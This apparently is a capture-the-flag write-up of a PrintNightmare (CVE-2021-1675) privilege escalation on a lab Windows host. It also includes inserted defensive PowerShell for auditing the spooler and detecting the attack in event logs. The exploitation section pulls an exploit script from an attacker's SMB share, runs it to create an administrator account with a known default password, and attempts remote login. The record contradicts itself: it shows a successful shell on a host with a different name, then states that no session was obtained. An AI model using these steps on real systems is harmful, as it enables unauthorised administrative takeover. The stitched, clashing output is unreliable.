CVE-2021-1675


A vulnerability classified as critical was found in Microsoft Windows (Operating System). Affected by this vulnerability is an unknown part of the component Print Spooler. It is known to affect confidentiality, integrity, and availability. Low-privileged users are able to add a printer and, specifically, provide a malicious driver for that printer, which results in an escalation of privileges to SYSTEM-level access.

Overview of CVE-2021-1675/CVE-2021-34527

Testing


The vulnerability takes advantage of the Windows-native service called Print Spooler, which is enabled by default on all Windows machines (servers and endpoints).

The target system gave away that it was running a spoolsv process, and it didn't seem like a patch had been installed for that.

On top of that, I knew from the MSRPC enumeration earlier on that the Spooler service was running. Too bad it wasn't exposed under a named pipe; had it been, I would have been able to exploit this remotely.

PS C:\tmp> Get-Service Spooler
 
Status   Name               DisplayName                           
------   ----               -----------                           
Running  Spooler            Print Spooler
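From the defender's side, the same facts the write-up establishes by hand (spooler running, spoolss exposed or not, unpatched driver-installation behaviour) can be pulled in one pass. The following PowerShell audit is an added example, not part of the original write-up or of Invoke-Nightmare; it assumes a local PowerShell 5.1+ session and reads the Point and Print policy values Microsoft documents in KB5005652. The function name Get-SpoolerExposure is made up for this example.

```powershell
# Added example: audit the preconditions PrintNightmare (CVE-2021-1675 / CVE-2021-34527)
# relies on. Not from the original write-up; Get-SpoolerExposure is a hypothetical name.
function Get-SpoolerExposure {
    $result = [ordered]@{}

    # 1. Is the Print Spooler service running, and does it start automatically?
    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $result.SpoolerStatus    = if ($svc) { $svc.Status.ToString() }    else { 'NotInstalled' }
    $result.SpoolerStartType = if ($svc) { $svc.StartType.ToString() } else { 'NotInstalled' }

    # 2. Is the spooler RPC interface reachable over SMB (\pipe\spoolss)?
    #    The remote variant (CVE-2021-34527) needs this pipe; the write-up's
    #    target did not expose it, which is why the attack stayed local.
    $pipes = [System.IO.Directory]::GetFiles('\\.\pipe\')
    $result.SpoolssPipePresent = [bool]($pipes -match '\\spoolss$')

    # 3. Point and Print hardening (KB5005652). After the Aug 2021 updates the
    #    default is equivalent to RestrictDriverInstallationToAdministrators=1;
    #    an explicit 0 re-opens driver installation to non-admins.
    $pnp   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $props = Get-ItemProperty -Path $pnp -ErrorAction SilentlyContinue
    $restrict = $props.RestrictDriverInstallationToAdministrators
    $result.RestrictDriverInstallToAdmins = if ($null -eq $restrict) { 'NotSet (patched default = restricted)' } else { $restrict }
    $result.NoWarningNoElevationOnInstall = $props.NoWarningNoElevationOnInstall
    $result.UpdatePromptSettings          = $props.UpdatePromptSettings

    # 4. Collect findings a reviewer would act on.
    $findings = @()
    if ($svc -and $svc.Status -eq 'Running')           { $findings += 'Spooler service is running' }
    if ($result.SpoolssPipePresent)                     { $findings += '\pipe\spoolss is exposed (remote RPC path)' }
    if ($restrict -eq 0)                                { $findings += 'RestrictDriverInstallationToAdministrators=0 (non-admins may install drivers)' }
    if ($props.NoWarningNoElevationOnInstall -eq 1)     { $findings += 'NoWarningNoElevationOnInstall=1 (silent Point and Print installs)' }
    $result.Findings = if ($findings) { $findings } else { 'none' }

    [pscustomobject]$result
}

Get-SpoolerExposure | Format-List
```

On a host that does not print, the mitigation is to stop and disable the service (Stop-Service Spooler; Set-Service Spooler -StartupType Disabled); where printing is needed, keep the patch level current and leave RestrictDriverInstallationToAdministrators at 1 so that adding a driver requires an administrator.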

Exploit (Invoke-Nightmare.ps1)


I found the exploit online; it's a PowerShell implementation of the original PrintNightmare exploit.

Exploitation


PS C:\tmp> copy \\10.10.14.5\smb\Invoke-Nightmare.ps1 .

I transferred the PowerShell script to the target system over SMB.

PS C:\tmp> . .\Invoke-Nightmare.ps1
PS C:\tmp> Invoke-Nightmare

I proceeded to import the exploit script and execute the exploit cmdlet.

Successful exploitation should create an administrator user by default.

PS C:\tmp> net user
 
User accounts for \\
 
-------------------------------------------------------------------------------
adm1n                    Administrator            DefaultAccount           
Guest                    WDAGUtilityAccount       
The command completed with one or more errors.

There is the adm1n user that the exploit generated.

PS C:\tmp> net user adm1n
User name                    adm1n
Full Name                    adm1n
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            2/1/2023 12:55:16 PM
Password expires             Never
Password changeable          2/1/2023 12:55:16 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   Never
 
Logon hours allowed          All
 
Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.

The newly created user is indeed part of the Administrators group. The credential, by default, is adm1n:P@ssw0rd.
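The two artifacts this run leaves behind, a printer driver added through the spooler and a new local user dropped into Administrators, are both logged by Windows. The following PowerShell triage is an added example, not part of the original write-up or of Invoke-Nightmare; it assumes the Microsoft-Windows-PrintService/Operational log has been enabled (it is off by default) and that the caller can read the Security log. The function name Get-PrintNightmareArtifacts is made up for this example.

```powershell
# Added example: collect the event-log traces of a spooler driver install followed by
# local admin creation. Not from the original write-up; the function name is hypothetical.
function Get-PrintNightmareArtifacts {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)
    $rows  = @()

    # 1. Driver installs through the spooler: PrintService/Operational event 316
    #    ("Printer driver <name> for Windows x64 was added or updated").
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316; StartTime = $since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $rows += [pscustomobject]@{
            Time    = $_.TimeCreated
            Event   = 316
            Summary = ($_.Message -split "`n")[0]   # first line carries the driver name
        }
    }

    # 2. Account changes in the Security log: 4720 (user account created) and
    #    4732 (member added to a security-enabled local group, e.g. Administrators).
    Get-WinEvent -FilterHashtable @{
        LogName = 'Security'; Id = 4720, 4732; StartTime = $since
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $data  = ([xml]$_.ToXml()).Event.EventData.Data
        $field = { param($n) ($data | Where-Object { $_.Name -eq $n }).'#text' }
        $subject = & $field 'SubjectUserName'
        if ($_.Id -eq 4720) {
            $summary = "account '$(& $field 'TargetUserName')' created by $subject"
        } else {
            $summary = "member $(& $field 'MemberSid') added to group '$(& $field 'TargetUserName')' by $subject"
        }
        $rows += [pscustomobject]@{ Time = $_.TimeCreated; Event = $_.Id; Summary = $summary }
    }

    $rows | Sort-Object Time
}

Get-PrintNightmareArtifacts -Hours 24 | Format-Table -AutoSize
```

The sequence to alert on is a 316 followed within seconds by a 4720 and a 4732 for the Administrators group whose subject is the SYSTEM context rather than an interactive user: the malicious driver is loaded into spoolsv.exe, which runs as SYSTEM, so the account creation is attributed to the machine rather than to the low-privileged user who started it.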

┌──(kali㉿kali)-[~/archive/htb/labs/return]
└─$ evil-winrm -i $IP -u 'adm1n' -p 'P@ssw0rd'
 
Evil-WinRM shell v3.4
 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
 
*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami
return\adm1n
*Evil-WinRM* PS C:\Users\adm1n\Documents> hostname
remote
*Evil-WinRM* PS C:\Users\adm1n\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::ba
   IPv6 Address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
   Link-local IPv6 Address . . . . . : fe80::25dd:3404:8d18:2459%12
   IPv4 Address. . . . . . . . . . . : 10.10.10.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
                                       10.10.10.2

System Level Compromise

For some reason, I was unable to WinRM to the target system with the newly created user.

I never really gained a session as the adm1n user, as the target system is configured in a manner where PSRemoting is completely disabled. The same goes for the SMB server: I was unable to use impacket-psexec, as the SMB server would just deny me even though I am an administrator. However, the exploit was a success, as it created an administrator user whose credential I know.